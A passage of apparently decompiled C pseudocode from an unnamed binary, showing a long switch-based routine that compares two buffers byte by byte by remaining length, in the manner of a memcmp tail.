							goto L11;
						}
						_t7 = (0 | _t1198 > 0x00000000) - 1; // -1
						_t1136 = (_t1198 > 0) + _t7;
						if(_t1136 != 0) {
							goto L98;
						}
						goto L9;
					}
					if(_t1135 > 0x1f) {
						L177:
						_t1007 = 0;
						goto L178;
					}
					switch( *((intOrPtr*)(_t1135 * 4 +  &M003C1514))) {
						case 0:
							goto L177;
						case 1:
							L256:
							__ecx =  *(__ecx - 1) & 0x000000ff;
							__eax =  *(__eax - 1) & 0x000000ff;
							__eax = __eax - __ecx;
							if(__eax != 0) {
								__ecx = 0;
								_t567 = (0 | __eax > 0x00000000) - 1; // -1
								__eax = (__eax > 0) + _t567;
							}
							goto L178;
						case 2:
							L335:
							if( *(__eax - 2) ==  *(__ecx - 2)) {
								goto L177;
							}
							goto L336;
						case 3:
							L416:
							__esi =  *(__eax - 3) & 0x000000ff;
							__edx =  *(__ecx - 3) & 0x000000ff;
							__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
							if(__esi == 0) {
								L336:
								__edx =  *(__ecx - 2) & 0x000000ff;
								__esi =  *(__eax - 2) & 0x000000ff;
								__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
								if(__esi == 0) {
									goto L256;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								if(__edx != 0) {
									L418:
									__eax = __edx;
									goto L178;
								}
								goto L256;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							if(__edx == 0) {
								goto L336;
							}
							goto L418;
						case 4:
							L165:
							__edx =  *(__eax - 4);
							if( *(__eax - 4) ==  *(__ecx - 4)) {
								__eax = 0;
								L176:
								if(__eax != 0) {
									goto L178;
								}
								goto L177;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 4) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
							if(__esi == 0) {
								L168:
								__esi =  *(__eax - 3) & 0x000000ff;
								__edx =  *(__ecx - 3) & 0x000000ff;
								__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
								if(__esi == 0) {
									L170:
									__esi =  *(__eax - 2) & 0x000000ff;
									__edx =  *(__ecx - 2) & 0x000000ff;
									__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
									if(__esi == 0) {
										L173:
										__eax =  *(__eax - 1) & 0x000000ff;
										__eax = __eax - __ecx;
										if(__eax != 0) {
											__ecx = 0;
											_t385 = (0 | __eax > 0x00000000) - 1; // -1
											__eax = (__eax > 0) + _t385;
										}
										goto L176;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									if(__edx == 0) {
										goto L173;
									}
									L172:
									__eax = __edx;
									goto L176;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								if(__edx != 0) {
									goto L172;
								}
								goto L170;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							if(__edx != 0) {
								goto L172;
							}
							goto L168;
						case 5:
							L245:
							__edx =  *(__eax - 5);
							if( *(__eax - 5) ==  *(__ecx - 5)) {
								__esi = 0;
								L255:
								if(__esi != 0) {
									goto L98;
								}
								goto L256;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 5) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
							if(__esi == 0) {
								L248:
								__esi =  *(__eax - 4) & 0x000000ff;
								__edx =  *(__ecx - 4) & 0x000000ff;
								__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
								if(__esi == 0) {
									L250:
									__esi =  *(__eax - 3) & 0x000000ff;
									__edx =  *(__ecx - 3) & 0x000000ff;
									__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
									if(__esi == 0) {
										L252:
										__esi =  *(__eax - 2) & 0x000000ff;
										__edx =  *(__ecx - 2) & 0x000000ff;
										__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t561 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t561;
										}
										goto L255;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t555 = __edx - 1; // -1
									__esi = __edx + _t555;
									if(__edx + _t555 != 0) {
										goto L98;
									}
									goto L252;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t549 = __edx - 1; // -1
								__esi = __edx + _t549;
								if(__edx + _t549 != 0) {
									goto L98;
								}
								goto L250;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t543 = __edx - 1; // -1
							__esi = __edx + _t543;
							if(__edx + _t543 != 0) {
								goto L98;
							}
							goto L248;
						case 6:
							L324:
							__edx =  *(__eax - 6);
							if( *(__eax - 6) ==  *(__ecx - 6)) {
								__esi = 0;
								L334:
								if(__esi != 0) {
									goto L98;
								}
								goto L335;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 6) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
							if(__esi == 0) {
								L327:
								__esi =  *(__eax - 5) & 0x000000ff;
								__edx =  *(__ecx - 5) & 0x000000ff;
								__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
								if(__esi == 0) {
									L329:
									__esi =  *(__eax - 4) & 0x000000ff;
									__edx =  *(__ecx - 4) & 0x000000ff;
									__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
									if(__esi == 0) {
										L331:
										__esi =  *(__eax - 3) & 0x000000ff;
										__edx =  *(__ecx - 3) & 0x000000ff;
										__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t743 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t743;
										}
										goto L334;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t737 = __edx - 1; // -1
									__esi = __edx + _t737;
									if(__edx + _t737 != 0) {
										goto L98;
									}
									goto L331;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t731 = __edx - 1; // -1
								__esi = __edx + _t731;
								if(__edx + _t731 != 0) {
									goto L98;
								}
								goto L329;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t725 = __edx - 1; // -1
							__esi = __edx + _t725;
							if(__edx + _t725 != 0) {
								goto L98;
							}
							goto L327;
						case 7:
							L405:
							__edx =  *(__eax - 7);
							if( *(__eax - 7) ==  *(__ecx - 7)) {
								__esi = 0;
								L415:
								if(__esi != 0) {
									goto L98;
								}
								goto L416;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 7) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
							if(__esi == 0) {
								L408:
								__esi =  *(__eax - 6) & 0x000000ff;
								__edx =  *(__ecx - 6) & 0x000000ff;
								__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
								if(__esi == 0) {
									L410:
									__esi =  *(__eax - 5) & 0x000000ff;
									__edx =  *(__ecx - 5) & 0x000000ff;
									__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
									if(__esi == 0) {
										L412:
										__esi =  *(__eax - 4) & 0x000000ff;
										__edx =  *(__ecx - 4) & 0x000000ff;
										__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t928 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t928;
										}
										goto L415;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t922 = __edx - 1; // -1
									__esi = __edx + _t922;
									if(__edx + _t922 != 0) {
										goto L98;
									}
									goto L412;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t916 = __edx - 1; // -1
								__esi = __edx + _t916;
								if(__edx + _t916 != 0) {
									goto L98;
								}
								goto L410;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t910 = __edx - 1; // -1
							__esi = __edx + _t910;
							if(__edx + _t910 != 0) {
								goto L98;
							}
							goto L408;
						case 8:
							L154:
							__edx =  *(__eax - 8);
							if( *(__eax - 8) ==  *(__ecx - 8)) {
								__esi = 0;
								L164:
								if(__esi != 0) {
									goto L98;
								}
								goto L165;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 8) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
							if(__esi == 0) {
								L157:
								__esi =  *(__eax - 7) & 0x000000ff;
								__edx =  *(__ecx - 7) & 0x000000ff;
								__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
								if(__esi == 0) {
									L159:
									__esi =  *(__eax - 6) & 0x000000ff;
									__edx =  *(__ecx - 6) & 0x000000ff;
									__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
									if(__esi == 0) {
										L161:
										__esi =  *(__eax - 5) & 0x000000ff;
										__edx =  *(__ecx - 5) & 0x000000ff;
										__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t360 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t360;
										}
										goto L164;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t354 = __edx - 1; // -1
									__esi = __edx + _t354;
									if(__edx + _t354 != 0) {
										goto L98;
									}
									goto L161;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t348 = __edx - 1; // -1
								__esi = __edx + _t348;
								if(__edx + _t348 != 0) {
									goto L98;
								}
								goto L159;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t342 = __edx - 1; // -1
							__esi = __edx + _t342;
							if(__edx + _t342 != 0) {
								goto L98;
							}
							goto L157;
						case 9:
							L234:
							__edx =  *(__eax - 9);
							if( *(__eax - 9) ==  *(__ecx - 9)) {
								__esi = 0;
								L244:
								if(__esi != 0) {
									goto L98;
								}
								goto L245;
							}
							__edx =  *(__ecx - 9) & 0x000000ff;
							__esi =  *(__eax - 9) & 0x000000ff;
							__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
							if(__esi == 0) {
								L237:
								__esi =  *(__eax - 8) & 0x000000ff;
								__edx =  *(__ecx - 8) & 0x000000ff;
								__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
								if(__esi == 0) {
									L239:
									__esi =  *(__eax - 7) & 0x000000ff;
									__edx =  *(__ecx - 7) & 0x000000ff;
									__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
									if(__esi == 0) {
										L241:
										__esi =  *(__eax - 6) & 0x000000ff;
										__edx =  *(__ecx - 6) & 0x000000ff;
										__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t536 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t536;
										}
										goto L244;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t530 = __edx - 1; // -1
									__esi = __edx + _t530;
									if(__edx + _t530 != 0) {
										goto L98;
									}
									goto L241;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t524 = __edx - 1; // -1
								__esi = __edx + _t524;
								if(__edx + _t524 != 0) {
									goto L98;
								}
								goto L239;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t518 = __edx - 1; // -1
							__esi = __edx + _t518;
							if(__edx + _t518 != 0) {
								goto L98;
							}
							goto L237;
						case 0xa:
							L313:
							__edx =  *(__eax - 0xa);
							if( *(__eax - 0xa) ==  *(__ecx - 0xa)) {
								__esi = 0;
								L323:
								if(__esi != 0) {
									goto L98;
								}
								goto L324;
							}
							__edx =  *(__ecx - 0xa) & 0x000000ff;
							__esi =  *(__eax - 0xa) & 0x000000ff;
							__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
							if(__esi == 0) {
								L316:
								__edx =  *(__ecx - 9) & 0x000000ff;
								__esi =  *(__eax - 9) & 0x000000ff;
								__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
								if(__esi == 0) {
									L318:
									__edx =  *(__ecx - 8) & 0x000000ff;
									__esi =  *(__eax - 8) & 0x000000ff;
									__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
									if(__esi == 0) {
										L320:
										__edx =  *(__ecx - 7) & 0x000000ff;
										__esi =  *(__eax - 7) & 0x000000ff;
										__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t718 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t718;
										}
										goto L323;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t712 = __edx - 1; // -1
									__esi = __edx + _t712;
									if(__edx + _t712 != 0) {
										goto L98;
									}
									goto L320;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t706 = __edx - 1; // -1
								__esi = __edx + _t706;
								if(__edx + _t706 != 0) {
									goto L98;
								}
								goto L318;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t700 = __edx - 1; // -1
							__esi = __edx + _t700;
							if(__edx + _t700 != 0) {
								goto L98;
							}
							goto L316;
						case 0xb:
							L394:
							__edx =  *(__eax - 0xb);
							if( *(__eax - 0xb) ==  *(__ecx - 0xb)) {
								__esi = 0;
								L404:
								if(__esi != 0) {
									goto L98;
								}
								goto L405;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0xb) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
							if(__esi == 0) {
								L397:
								__esi =  *(__eax - 0xa) & 0x000000ff;
								__edx =  *(__ecx - 0xa) & 0x000000ff;
								__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
								if(__esi == 0) {
									L399:
									__esi =  *(__eax - 9) & 0x000000ff;
									__edx =  *(__ecx - 9) & 0x000000ff;
									__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
									if(__esi == 0) {
										L401:
										__esi =  *(__eax - 8) & 0x000000ff;
										__edx =  *(__ecx - 8) & 0x000000ff;
										__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t903 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t903;
										}
										goto L404;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t897 = __edx - 1; // -1
									__esi = __edx + _t897;
									if(__edx + _t897 != 0) {
										goto L98;
									}
									goto L401;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t891 = __edx - 1; // -1
								__esi = __edx + _t891;
								if(__edx + _t891 != 0) {
									goto L98;
								}
								goto L399;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t885 = __edx - 1; // -1
							__esi = __edx + _t885;
							if(__edx + _t885 != 0) {
								goto L98;
							}
							goto L397;
						case 0xc:
							L143:
							__edx =  *(__eax - 0xc);
							if( *(__eax - 0xc) ==  *(__ecx - 0xc)) {
								__esi = 0;
								L153:
								if(__esi != 0) {
									goto L98;
								}
								goto L154;
							}
							__edx =  *(__ecx - 0xc) & 0x000000ff;
							__esi =  *(__eax - 0xc) & 0x000000ff;
							__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
							if(__esi == 0) {
								L146:
								__esi =  *(__eax - 0xb) & 0x000000ff;
								__edx =  *(__ecx - 0xb) & 0x000000ff;
								__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
								if(__esi == 0) {
									L148:
									__esi =  *(__eax - 0xa) & 0x000000ff;
									__edx =  *(__ecx - 0xa) & 0x000000ff;
									__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
									if(__esi == 0) {
										L150:
										__esi =  *(__eax - 9) & 0x000000ff;
										__edx =  *(__ecx - 9) & 0x000000ff;
										__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t335 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t335;
										}
										goto L153;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t329 = __edx - 1; // -1
									__esi = __edx + _t329;
									if(__edx + _t329 != 0) {
										goto L98;
									}
									goto L150;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t323 = __edx - 1; // -1
								__esi = __edx + _t323;
								if(__edx + _t323 != 0) {
									goto L98;
								}
								goto L148;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t317 = __edx - 1; // -1
							__esi = __edx + _t317;
							if(__edx + _t317 != 0) {
								goto L98;
							}
							goto L146;
						case 0xd:
							L223:
							__edx =  *(__eax - 0xd);
							if( *(__eax - 0xd) ==  *(__ecx - 0xd)) {
								__esi = 0;
								L233:
								if(__esi != 0) {
									goto L98;
								}
								goto L234;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0xd) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
							if(__esi == 0) {
								L226:
								__esi =  *(__eax - 0xc) & 0x000000ff;
								__edx =  *(__ecx - 0xc) & 0x000000ff;
								__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
								if(__esi == 0) {
									L228:
									__esi =  *(__eax - 0xb) & 0x000000ff;
									__edx =  *(__ecx - 0xb) & 0x000000ff;
									__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
									if(__esi == 0) {
										L230:
										__esi =  *(__eax - 0xa) & 0x000000ff;
										__edx =  *(__ecx - 0xa) & 0x000000ff;
										__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t510 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t510;
										}
										goto L233;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t504 = __edx - 1; // -1
									__esi = __edx + _t504;
									if(__edx + _t504 != 0) {
										goto L98;
									}
									goto L230;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t498 = __edx - 1; // -1
								__esi = __edx + _t498;
								if(__edx + _t498 != 0) {
									goto L98;
								}
								goto L228;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t492 = __edx - 1; // -1
							__esi = __edx + _t492;
							if(__edx + _t492 != 0) {
								goto L98;
							}
							goto L226;
						case 0xe:
							L302:
							__edx =  *(__eax - 0xe);
							if( *(__eax - 0xe) ==  *(__ecx - 0xe)) {
								__esi = 0;
								L312:
								if(__esi != 0) {
									goto L98;
								}
								goto L313;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0xe) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
							if(__esi == 0) {
								L305:
								__esi =  *(__eax - 0xd) & 0x000000ff;
								__edx =  *(__ecx - 0xd) & 0x000000ff;
								__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
								if(__esi == 0) {
									L307:
									__esi =  *(__eax - 0xc) & 0x000000ff;
									__edx =  *(__ecx - 0xc) & 0x000000ff;
									__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
									if(__esi == 0) {
										L309:
										__esi =  *(__eax - 0xb) & 0x000000ff;
										__edx =  *(__ecx - 0xb) & 0x000000ff;
										__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t692 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t692;
										}
										goto L312;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t686 = __edx - 1; // -1
									__esi = __edx + _t686;
									if(__edx + _t686 != 0) {
										goto L98;
									}
									goto L309;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t680 = __edx - 1; // -1
								__esi = __edx + _t680;
								if(__edx + _t680 != 0) {
									goto L98;
								}
								goto L307;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t674 = __edx - 1; // -1
							__esi = __edx + _t674;
							if(__edx + _t674 != 0) {
								goto L98;
							}
							goto L305;
						case 0xf:
							L383:
							__edx =  *(__eax - 0xf);
							if( *(__eax - 0xf) ==  *(__ecx - 0xf)) {
								__esi = 0;
								L393:
								if(__esi != 0) {
									goto L98;
								}
								goto L394;
							}
							__edx =  *(__ecx - 0xf) & 0x000000ff;
							__esi =  *(__eax - 0xf) & 0x000000ff;
							__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
							if(__esi == 0) {
								L386:
								__esi =  *(__eax - 0xe) & 0x000000ff;
								__edx =  *(__ecx - 0xe) & 0x000000ff;
								__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
								if(__esi == 0) {
									L388:
									__esi =  *(__eax - 0xd) & 0x000000ff;
									__edx =  *(__ecx - 0xd) & 0x000000ff;
									__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
									if(__esi == 0) {
										L390:
										__esi =  *(__eax - 0xc) & 0x000000ff;
										__edx =  *(__ecx - 0xc) & 0x000000ff;
										__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t878 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t878;
										}
										goto L393;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t872 = __edx - 1; // -1
									__esi = __edx + _t872;
									if(__edx + _t872 != 0) {
										goto L98;
									}
									goto L390;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t866 = __edx - 1; // -1
								__esi = __edx + _t866;
								if(__edx + _t866 != 0) {
									goto L98;
								}
								goto L388;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t860 = __edx - 1; // -1
							__esi = __edx + _t860;
							if(__edx + _t860 != 0) {
								goto L98;
							}
							goto L386;
						case 0x10:
							L132:
							__edx =  *(__eax - 0x10);
							if( *(__eax - 0x10) ==  *(__ecx - 0x10)) {
								__esi = 0;
								L142:
								if(__esi != 0) {
									goto L98;
								}
								goto L143;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x10) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
							if(__esi == 0) {
								L135:
								__esi =  *(__eax - 0xf) & 0x000000ff;
								__edx =  *(__ecx - 0xf) & 0x000000ff;
								__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
								if(__esi == 0) {
									L137:
									__esi =  *(__eax - 0xe) & 0x000000ff;
									__edx =  *(__ecx - 0xe) & 0x000000ff;
									__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
									if(__esi == 0) {
										L139:
										__esi =  *(__eax - 0xd) & 0x000000ff;
										__edx =  *(__ecx - 0xd) & 0x000000ff;
										__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t309 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t309;
										}
										goto L142;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t303 = __edx - 1; // -1
									__esi = __edx + _t303;
									if(__edx + _t303 != 0) {
										goto L98;
									}
									goto L139;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t297 = __edx - 1; // -1
								__esi = __edx + _t297;
								if(__edx + _t297 != 0) {
									goto L98;
								}
								goto L137;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t291 = __edx - 1; // -1
							__esi = __edx + _t291;
							if(__edx + _t291 != 0) {
								goto L98;
							}
							goto L135;
						case 0x11:
							L212:
							__edx =  *(__eax - 0x11);
							if( *(__eax - 0x11) ==  *(__ecx - 0x11)) {
								__esi = 0;
								L222:
								if(__esi != 0) {
									goto L98;
								}
								goto L223;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x11) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
							if(__esi == 0) {
								L215:
								__esi =  *(__eax - 0x10) & 0x000000ff;
								__edx =  *(__ecx - 0x10) & 0x000000ff;
								__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
								if(__esi == 0) {
									L217:
									__esi =  *(__eax - 0xf) & 0x000000ff;
									__edx =  *(__ecx - 0xf) & 0x000000ff;
									__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
									if(__esi == 0) {
										L219:
										__esi =  *(__eax - 0xe) & 0x000000ff;
										__edx =  *(__ecx - 0xe) & 0x000000ff;
										__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t485 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t485;
										}
										goto L222;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t479 = __edx - 1; // -1
									__esi = __edx + _t479;
									if(__edx + _t479 != 0) {
										goto L98;
									}
									goto L219;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t473 = __edx - 1; // -1
								__esi = __edx + _t473;
								if(__edx + _t473 != 0) {
									goto L98;
								}
								goto L217;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t467 = __edx - 1; // -1
							__esi = __edx + _t467;
							if(__edx + _t467 != 0) {
								goto L98;
							}
							goto L215;
						case 0x12:
							L291:
							__edx =  *(__eax - 0x12);
							if( *(__eax - 0x12) ==  *(__ecx - 0x12)) {
								__esi = 0;
								L301:
								if(__esi != 0) {
									goto L98;
								}
								goto L302;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x12) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
							if(__esi == 0) {
								L294:
								__esi =  *(__eax - 0x11) & 0x000000ff;
								__edx =  *(__ecx - 0x11) & 0x000000ff;
								__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
								if(__esi == 0) {
									L296:
									__esi =  *(__eax - 0x10) & 0x000000ff;
									__edx =  *(__ecx - 0x10) & 0x000000ff;
									__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
									if(__esi == 0) {
										L298:
										__esi =  *(__eax - 0xf) & 0x000000ff;
										__edx =  *(__ecx - 0xf) & 0x000000ff;
										__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
										if(__esi != 0) {
											__edx = 0;
											_t667 = (0 | __esi > 0x00000000) - 1; // -1
											__esi = (__esi > 0) + _t667;
										}
										goto L301;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									_t661 = __edx - 1; // -1
									__esi = __edx + _t661;
									if(__edx + _t661 != 0) {
										goto L98;
									}
									goto L298;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								_t655 = __edx - 1; // -1
								__esi = __edx + _t655;
								if(__edx + _t655 != 0) {
									goto L98;
								}
								goto L296;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t649 = __edx - 1; // -1
							__esi = __edx + _t649;
							if(__edx + _t649 != 0) {
								goto L98;
							}
							goto L294;
						case 0x13:
							L372:
							__edx =  *(__eax - 0x13);
							if( *(__eax - 0x13) ==  *(__ecx - 0x13)) {
								__esi = 0;
								L382:
								if(__esi != 0) {
									goto L98;
								}
								goto L383;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 0x13) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
							if(__esi == 0) {
								L375:
								__esi =  *(__eax - 0x12) & 0x000000ff;
								__edx =  *(__ecx - 0x12) & 0x000000ff;
